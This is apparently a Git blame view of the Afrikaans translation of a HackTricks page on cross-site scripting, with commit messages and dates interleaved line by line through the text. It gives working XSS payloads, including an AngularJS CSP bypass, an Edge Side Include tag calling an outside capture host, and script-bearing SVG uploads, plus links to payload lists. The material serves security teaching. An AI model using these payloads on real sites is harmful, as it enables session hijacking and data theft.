 								<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
 								<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
 								<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Regex - Toegang tot Versteekte Inhoud
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Vanaf [**hierdie skryfstuk**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) is dit moontlik om te leer dat selfs al verdwyn sommige waardes uit JS, dit steeds moontlik is om hulle te vind in JS-eienskappe in verskillende objekte. Byvoorbeeld, 'n invoer van 'n REGEX is steeds moontlik om dit te vind nadat die waarde van die invoer van die regex verwyder is:
-												GitBook: [#3744] No subject

											
										
										
											2023-01-12 12:36:15 +00:00
+								```javascript
 								// Do regex with flag
 								flag="CTF{FLAG}"
 								re=/./g
 								re.test(flag);
 								// Remove flag value, nobody will be able to get it, right?
 								flag=""
 								// Access previous regex input
 								console.log(RegExp.input)
 								console.log(RegExp.rightContext)
 								console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Brute-Force Lys
-												GitBook: [master] 10 pages modified
											
										
										
											2021-06-27 21:56:13 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
-												GitBook: [master] 10 pages modified
											
										
										
											2021-06-27 21:56:13 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## XSS Misbruik van ander kwesbaarhede
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3167] No subject

											
										
										
											2022-05-01 16:57:45 +00:00
+								### XSS in Markdown
-												GitBook: [#2869] update xss in markdown

											
										
										
											2021-11-29 10:15:51 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Kan Markdown-kode inspuit wat gerender sal word? Dalk kan jy XSS kry! Kontroleer:
-												GitBook: [#3180] No subject

											
										
										
											2022-05-05 23:53:10 +00:00
 								{% content-ref url="xss-in-markdown.md" %}
 								[xss-in-markdown.md](xss-in-markdown.md)
 								{% endcontent-ref %}
-												GitBook: [#2869] update xss in markdown

											
										
										
											2021-11-29 10:15:51 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### XSS na SSRF
-												GitBook: [master] one page modified
											
										
										
											2020-09-09 09:02:24 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Het jy XSS op 'n **webwerf wat kaching gebruik**? Probeer **om dit na SSRF op te gradeer** deur Edge Side Include Injection met hierdie lading:
-												GitBook: [master] one page modified
											
										
										
											2020-09-09 09:02:24 +00:00
+								```python
 								<esi:include src="http://yoursite.com/capture" />
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Gebruik dit om koekiebeperkings, XSS-filters en baie meer te omseil!\
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Meer inligting oor hierdie tegniek hier: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).
-												GitBook: [master] one page modified
											
										
										
											2020-09-09 09:02:24 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### XSS in dinamies geskep PDF
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As 'n webbladsy 'n PDF skep deur gebruikersbeheerde insette te gebruik, kan jy probeer om die **robot te mislei** wat die PDF skep om **arbitrêre JS-kode uit te voer**.\
 								Dus, as die **PDF-skepper-robot** 'n soort **HTML-tjokkies vind**, gaan dit hulle **interpreteer**, en jy kan van hierdie gedrag **misbruik** maak om 'n **Bediener XSS** te veroorsaak.
-												GitBook: [master] 4 pages modified
											
										
										
											2020-12-24 09:46:40 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="server-side-xss-dynamic-pdf.md" %}
 								[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
 								{% endcontent-ref %}
-												GitBook: [master] 4 pages modified
											
										
										
											2020-12-24 09:46:40 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								As jy nie HTML-tjokkies kan inspuit nie, kan dit die moeite werd wees om te probeer om **PDF-data in te spuit**:
-												GitBook: [master] 4 pages modified
											
										
										
											2020-12-24 09:46:40 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="pdf-injection.md" %}
 								[pdf-injection.md](pdf-injection.md)
 								{% endcontent-ref %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3394] No subject

											
										
										
											2022-08-16 09:38:59 +00:00
+								### XSS in Amp4Email
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								AMP, gemik op die versnelling van webbladprestasie op mobiele toestelle, sluit HTML-tjokkies aangevul deur JavaScript in om funksionaliteit te verseker met 'n klem op spoed en sekuriteit. Dit ondersteun 'n verskeidenheid komponente vir verskeie kenmerke, toeganklik via [AMP-komponente](https://amp.dev/documentation/components/?format=websites).
-												GitBook: [#3394] No subject

											
										
										
											2022-08-16 09:38:59 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Die [**AMP vir E-pos**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) formaat brei spesifieke AMP-komponente uit na e-posse, wat ontvangers in staat stel om direk met inhoud in hul e-posse te interaksioneer.
-												GitBook: [#3394] No subject

											
										
										
											2022-08-16 09:38:59 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Voorbeeld [**writeup XSS in Amp4Email in Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### XSS-lêers oplaai (svg)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Laai 'n lêer soos die volgende een op as 'n beeld (vanaf [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								Content-Type: multipart/form-data; boundary=---------------------------232181429808
 								Content-Length: 574
 								-----------------------------232181429808
 								Content-Disposition: form-data; name="img"; filename="img.svg"
 								Content-Type: image/svg+xml
-												GitBook: [master] one page modified
											
										
										
											2021-04-12 14:09:57 +00:00
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<?xml version="1.0" standalone="no"?>
 								<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 								<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
 								<script type="text/javascript">
 								alert(1);
 								</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</svg>
 								-----------------------------232181429808--
 								```
-												GitBook: [master] one page modified
											
										
										
											2021-06-15 09:31:42 +00:00
+								```markup
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								<script type="text/javascript">alert("XSS")</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</svg>
 								```
-												GitBook: [master] one page modified
											
										
										
											2021-06-15 09:31:42 +00:00
+								```markup
-												GitBook: [master] one page modified
											
										
										
											2021-01-22 11:00:52 +00:00
+								<?xml version="1.0" standalone="no"?>
 								<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 								<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 								<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 								<script type="text/javascript">
 								alert("XSS");
 								</script>
 								</svg>
 								```
-												GitBook: [#3154] No subject

											
										
										
											2022-04-30 10:09:20 +00:00
+								```svg
 								<svg width="500" height="500"
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
 								<circle cx="50" cy="50" r="45" fill="green"
 								id="foo"/>
 								<foreignObject width="500" height="500">
 								<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
 								<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
 								</foreignObject>
-												GitBook: [#3280] No subject

											
										
										
											2022-06-25 15:45:47 +00:00
+								</svg>
-												GitBook: [#3154] No subject

											
										
										
											2022-04-30 10:09:20 +00:00
+								```
-												GitBook: [#3328] No subject

											
										
										
											2022-07-20 09:38:23 +00:00
+								```html
 								<svg><use href="//portswigger-labs.net/use_element/upload.php#x"/></svg>
 								```
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								```xml
 								<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Vind **meer SVG-vragte** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								## Verskeie JS-truuks & relevante inligting
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								{% content-ref url="other-js-tricks.md" %}
 								[other-js-tricks.md](other-js-tricks.md)
 								{% endcontent-ref %}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## XSS-bronne
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
-												GITBOOK-3817: No subject

											
										
										
											2023-03-05 22:20:47 +00:00
+								* [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list)
 								* [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list)
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
+								* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jy belangstel in **hacking loopbaan** en hack die onhackbare - **ons is aan die werf!** (_vloeiende Pools geskrewe en gespreek benodig_).
-												GitBook: [#3193] No subject

											
										
										
											2022-05-08 22:42:39 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								{% embed url="https://www.stmcyber.com/careers" %}
-												GitBook: [#3193] No subject

											
										
										
											2022-05-08 22:42:39 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Ander maniere om HackTricks te ondersteun:
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>